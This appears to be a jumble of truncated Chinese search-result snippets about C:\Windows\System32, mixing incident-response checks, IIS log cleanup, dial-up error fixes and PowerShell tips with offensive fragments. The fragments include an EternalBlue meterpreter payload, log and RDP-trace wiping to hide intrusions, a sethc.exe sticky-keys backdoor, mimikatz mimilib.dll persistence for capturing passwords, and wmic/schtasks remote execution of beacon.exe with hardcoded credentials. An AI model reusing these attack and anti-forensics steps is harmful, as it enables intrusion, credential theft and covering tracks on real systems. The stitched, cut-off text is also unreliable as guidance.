• 使用 last 命令(需安装 Sysinternals Suite) last -f C:\Windows\System32\winevt\Logs\Security.evtx 查看最近登录记录。...\Temp\*.exe • 检查系统目录(如 System32): dir /a /s /od C:\Windows\System32\*.exe 关注近期新增或修改的 .exe、.dll 文件。...(3)检查文件修改时间 • 查找近期修改的文件: Get-ChildItem -Path C:\ -Recurse -ErrorAction SilentlyContinue | Where-Object...(4)检查 WMI 持久化 • 查询 WMI 事件订阅: wmic /namespace:\\root\subscription path __eventfilter get name wmic /namespace...检查日志是否被清除 攻击者可能删除日志掩盖行踪: • 查看日志文件大小: dir C:\Windows\System32\winevt\Logs\ 如果 Security.evtx 异常小(如几 KB)
/smb/ms17_010_eternalblue #攻击测试set payload windows/x64/meterpreter/bind_tcp #这里正向使用的是正向shell,是基于我们可以访问到对方...,查看更多) 清理前后: 防火墙日志清理 cd logfiles/firewalldel xxx.log 服务器日志清理 默认情况,在 %systemroot%\system32\logfles\...FTP日志默认位置:%systemroot%\system32\logfiles\msftpsvc1\WWW日志默认位置:%sys temroot%\sys tem32\logfiles\w3svc1\...S);隐藏文件属性(H)attrib Default.rdp -s -h# 删除del Default.rdp(向右滑动,查看更多) 近期访问记录清理 # 用户最近访问过的文件和网页记录C:\Users...\root\AppData\Local\Microsoft\Windows\History# 近期访问过的文件C:\Users\root\Recent(向右滑动,查看更多) 安全删除文件利用cipher
如果错误仍然存在,请删除并重新创建“网络和拨号连接”. 2、win7 错误代码651,路由能上,拨号上不了 试一下:打开 \windows\system32\logfiles\wmi,双击打开wmi再打开里面的...RtBackup 会提示你需要管理员权限 继续 重启,即可修复。...3、不行的话把wmi里的后缀为etl的文件删除包括RtBackup里的 重启 4、如果上面的都不管用的话那尝试一下,禁用本地连接-关机-检查猫的所有插头拔下重插-拔下猫的电源插头-等待2分钟 之后插上插头...5、最后一招先从别的能上网的系统的机子里复制下面这个文件 c:\windows\system32\drivers\raspppoe.sys 来替换你电脑里的这个文件。...宽带连接错误691(由于域上的用户名或密码无效而拒绝访问)/错误635(未知错误)的处理流程如下: (1)用户名密码填写错误 (2)如果用户帐号密码填写无误,则进入下一步继续处理;建议重建拨号软件(如果不懂装拨号软件
IIS Log:%SystemDrive%\inetpub\logs\LogFiles\W3SVC{siteid}\C:\inetpub\logs\LogFiles\W3SVC{siteid}\HttpErr...Log : %SystemDrive%\Windows\System32\LogFiles\HTTPERRC:\Windows\System32\LogFiles\HTTPERR注意事项:IIS和HTTPERR...ID为1的,对应的日志就是C:\inetpub\logs\LogFiles\W3SVC1ID为2的,对应的日志就是C:\inetpub\logs\LogFiles\W3SVC2ID为3的,对应的日志就是...C:\inetpub\logs\LogFiles\W3SVC3HTTP Error日志:默认路径C:\Windows\System32\LogFiles\HTTPERR如果日志分析不出什么来,并且问题现象能稳定复现...,那就得结合procdump来看了图片https://docs.microsoft.com/en-us/sysinternals/downloads/procdumpc:\windows\system32
\Software\Microsoft\Windows\CurrentVersion\Run 删除可疑键值(如异常.exe或.vbs路径)。...● 系统启动文件夹 C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup C:\Users\\AppData\Roaming...清除WMI后门 # 检查恶意WMI事件订阅 Get-WMIObject -Namespace root\Subscription -Class __EventFilter # 删除可疑条目(名称替换为实际值...方法二:搜索近期修改的文件: Get-ChildItem -Path C:\ -Recurse -File | Where-Object { $_.LastWriteTime -gt (Get-Date...重点目录排查 ∙ C:\Windows\Temp\ ∙ C:\Users\\AppData\Local\Temp\ ∙ C:\Windows\System32\Tasks\(计划任务脚本) 3
方法1:用everything搜索比如要搜system32目录的.dll文件输入目录的绝对路径 空格 .dll,然后按路径排序,然后按住shift选择system32根目录的文件,右击点复制完整路径和文件名...,粘贴到记事本文件里即可图片方法2:用powershell命令,比如导出windows根目录 system32根目录的可执行文件,举例如下比较low的代码cd "c:\windows\system32"...比较牛逼的代码Get-ChildItem -Path C:\Windows\System32 -Filter ***.dll** -File | Sort-Object Length -Descending...| ForEach-Object { $_.Name }Get-ChildItem -Path C:\Windows\System32 -Filter ***.dll** -File | Sort-Object...Length -Descending | ForEach-Object { $_.BaseName }(Get-ChildItem -Path C:\Windows\System32 -Filter
# 删除 Windows 更新临时文件$WindowsUpdateTemp = "C:\Windows\SoftwareDistribution\Download\*"$initialUpdateSize...= Get-DirectorySize "C:\Windows\SoftwareDistribution\Download"Remove-Item $WindowsUpdateTemp -Recurse...# 删除系统日志文件$LogFiles = "C:\Windows\Logs\*"$initialLogSize = Get-DirectorySize "C:\Windows\Logs"Remove-Item...$LogFiles -Recurse -Force -ErrorAction SilentlyContinue$totalFreedSpace += $initialLogSizeWrite-Host...# 删除 Download 文件夹中超过30天未访问的文件$DownloadFolder = "$env:USERPROFILE\Downloads\*"Get-ChildItem -Path $DownloadFolder
\system32\cmd.exe PS Env:\> start-process $Env:ComSpec #Example 3.将location设置为C:驱动器中的当前位置 PS C:\Windows...).LastAccessTime # 2021年3月9日 9:28:51 (Get-Item C:\Windows\System32\calc.exe).Mode # -a---- (Get-Item...C:\Windows\System32\calc.exe).Directory # 父目录 # Mode LastWriteTime Length...-Attributes Hidden ls -Attributes a # 显示指定属性的文件或者目录 # 5.访问传统文件系统一样访问 PSDrive ,此次显示当前系统的已加载的证书 Get-ChildItem...:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name "SecurityHealth" # C:\WINDOWS\system32\SecurityHealthSystray.exe
403 502的记录,HTTP Error日志没产生记录IIS Log:%SystemDrive%\inetpub\logs\LogFiles\W3SVC{siteid}\C:\inetpub\logs...\LogFiles\W3SVC{siteid}\HttpErr Log : %SystemDrive%\Windows\System32\LogFiles\HTTPERRC:\Windows\System32...%>index.aspx代码如下:C#" ContentType="text/html" ResponseEncoding="gb2312" %>C#" runat="Server">void Page_Load(Object src, EventArgs e){ label1.Text = "Hello World";}访问日志里都是403 502的记录,但公网访问时只报了403,并没有把502报出来HTTP Error日志没产生记录(默认路径C:\Windows\System32\LogFiles\HTTPERR)
\system32 move sethc.exe sethc.exe.bak copy cmd.exe sethc.exe 防范: 在远程登录服务器时连续按5次“shift”键,判断服务器是否被人侵 拒绝使用...\CurrentVersion\Run /v RegRun /t REG_SZ /d "c:\windows\system32\calc.exe" 3、计划任务后门 计划任务在Windows7及之前使用...\mimilsa.log (2)方法二 将mimikatz中的mimilib.dll放到系统的C:\Windows\System32\目录下,并将mimilib.dll添加到注册表中,重启也能持久化...\mimilib.dll C:\Windows\System32\ Set-ItemProperty "hklm:\system\currentcontrolset\control\lsa\" -name..."Security Packages" -value "mimilib.dll" //重启之后使用命令查看密码 powershell.exe cat c:\windows\system32\kiwissp.log
WMI 特点: WMI有一组API: 我们不管使用VBScript、PowerShell脚本还是利用C#的来访问WMI的类库,都是因为WMI向外暴露的一组API,通过调用API实现使用指定的类。...其不能直接进行执行需要切换终端到C:\Windows\System32\wbem位置下才能进行调用;通过 WMI 实现数据的收集与管理,包括提供注册、请求传送、远程管理、安全管理、查询能力、和脚本编程能力等...\Windows\System32\wbem> wmic process list brief PS C:\Windows\System32\wbem> wmic process list full #...\Windows\System32\notepad.exe" #新建notepad进程 或者 该路径有空格的情况下 "C:\Program Files\Tencent\QQ\QQ.exe" wmic...C:\WINDOWS\system32\svchost.exe的 wmic process where "name='svchost.exe' and ExecutablePath'C:\\WINDOWS
在Win10中,wmic已经归入C:\Windows\System32\wbem文件夹,而环境变量只设置到C:\Windows\System32,因此找不到wmic 只需要添加C:\Windows\System32...c:/beacon.exe" #普通账号显示拒绝访问 权限不够,DC账号可用 wmic /node:192.168.3.32 /user:administrator /password:admin!.../administrator:@192.168.3.32 create -name shell -display shellexec -path C:\Windows\System32\shell.exe...wmi_exec='python3 ....@#45@%s "c:/webserver4444.exe"'%ip print(wmi_exec) os.system(wmi_exec) if __
WinSxS(Windows Side-by-Side):存储系统组件的多个版本,用于兼容性。 Fonts:系统字体文件。 Temp:系统临时文件(需管理员权限访问)。...C:\Windows\System32\config\ 存放 Windows 注册表的核心文件(如 SAM、SYSTEM、SOFTWARE 等)。...启动和日志目录 C:\Windows\System32\drivers\etc\ 存放 hosts 文件等网络配置。 C:\Windows\System32\LogFiles\ 系统日志文件。...注意事项 修改风险:C:\Windows\、System32 等目录下的文件切勿随意删除或修改,可能导致系统崩溃。...路径变量: 可通过环境变量快速访问(如 %AppData% 指向 AppData\Roaming,%Temp% 指向用户临时目录)。
计划任务目录文件 计划任务服务会讲所有设置的计划任务保存一份儿到文件,具体路径为 C:\Windows\System32\Tasks 使用记事本打开相关文件 这里提一点,修改计划任务文件不会影响计划任务的执行...\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\User...Tools\Applications C:\Windows\system32 C:\Windows C:\Windows\System32\Wbem C:\Windows\System32\WindowsPowerShell...11,版本 21H2 (10.0;内部版本 22000) 及更高版本) 应用程序的文件夹 系统文件夹 (C:\Windows\System32) 使用 GetSystemDirectoryA 函数检索此文件夹的路径...\Windows\System32)和系统路径(如PATH环境变量所指定的路径)中搜索。
一、清理IIS日志文件 打开文年夹C:\Windows\System32\LogFiles 可以看到日志有10多个G。...(访问多的会更多) 图片 同时也要检查:C:\inetpub\logs\LogFiles 这些日志文件夹。...二、清理不必要文件 服务器IIS日志清理后,清理以下文件: C:\WINDOWS\PCHealth\ERRORREP\QSIGNOFF C:\WINDOWS\PCHealth\ERRORREP\UserDumps...C:\Windows\Temp 三、虚拟内存转移到其他硬盘 服务器虚拟内存默认是在C盘的,将虚拟内存转移到其他盘,如D盘或是E盘,可以增加C盘的空间,虚拟内存设置方法点击这里查看 虚拟内存设置到其他盘服务器需要重启才能生效...,服务器重启也可以关闭很多系统产生的缓存文件 删除不必要的文件对清理C盘作用不大,主要就是清理IIS系统日志和虚拟内存设置可以解决服务器c盘空间不足的问题 最后说一下,很多程序路径默认都是C盘,在安装的时候路径可以更换到
这对于攻击者来说特别有用,因为可以通过 SMB 调度任务,因此启动远程服务的语法是: sc \\ host.domain创建ExampleService binpath= “c:\windows\system32...) 内置于 Windows 中,允许通过 WMI 服务远程访问 Windows 组件。...示例 WMI 查询如下所示: wmic /node:target.domain /user:domain\user /password:password 进程调用创建“C:\Windows\System32...,但如果 Windows 无法到达超过 445 和 139 的路径,它最终将回退到端口 80。...\Windows\Temp\test.hta” ieframe.dll:可以运行.url文件 .url 文件示例: [互联网快捷方式] URL=file:///c:\windows\system32\
c:\windows\system32\inetsrv> 查看当前的权限:whoami c:\windows\system32\inetsrv>whoami whoami nt authority\network...service c:\windows\system32\inetsrv> network service是一个一般用户的权限 提权操作 使用Metasploit对Windows-2003进行提权:...用到pr.exe提权exp 首先使用shell命令看看能不能创建文件夹: c:\windows\system32\inetsrv>md 123 md 123 拒绝访问。...c:\windows\system32\inetsrv>netstat -an netstat -an Active Connections Proto Local Address...\windows\system32\inetsrv> 从上面可以看到,它没有开放3389端口!
在CS中,您可以专门制作服务可执行文件: WMI Windows内置Windows Management Instrumentation(WMI),以允许通过WMI服务远程访问Windows组件。...\System32\calc.exe” Cobalt Strike利用WMI在目标上执行Powershell的payload,因此使用内置WMI时PowerShell.exe将打开,这是OpSec问题,...schtasks /create /tn ExampleTask /tr c:\windows\system32\calc.exe /sc once /st 00:00 /S host.domain /...,但是如果Windows无法通过445和139到达路径,则Windows最终将退回到端口80。...\Windows\Temp\test.hta" ieframe.dll: 可以运行.url文件 [InternetShortcut] URL=file:///c:\windows\system32\cmd.exe
最近突然发现c盘还剩很少的空间,导致iis运行都不正常了,原来是LogFiles的日志太大了,已经达到了70多g,赶紧删除了并将日志关闭 IIS日志满了,清理一下就好了,日志一般的路径为C:\Windows...\System32\LogFiles 下面是iis7.5 关闭日志的方法 打开Internet 信息服务(IIS)管理器; 左侧定位到要关闭日志的站点 右侧找到"日志"双击进入界面; 双击日志;
Get-ChildItem -Recurse *.exe 修改hosts 访问谷歌的一种方式就是更改hosts文件。这里就用Powershell做一个修改hosts的功能。...PS C:\WINDOWS\system32> Get-ProcessGet-Process 上面这个命令会显示所有进程。...PS C:\WINDOWS\system32> notepad;notepad;notepad; PS C:\WINDOWS\system32> $notepads=Get-Process -Name...notepad PS C:\WINDOWS\system32> $notepads.Count 3 PS C:\WINDOWS\system32> $notepads.Kill() 再学习Powershell...PS C:\WINDOWS\system32> Get-Process powershell |Where-Object {$_.Id -ne $PID}|Stop-Process -PassThru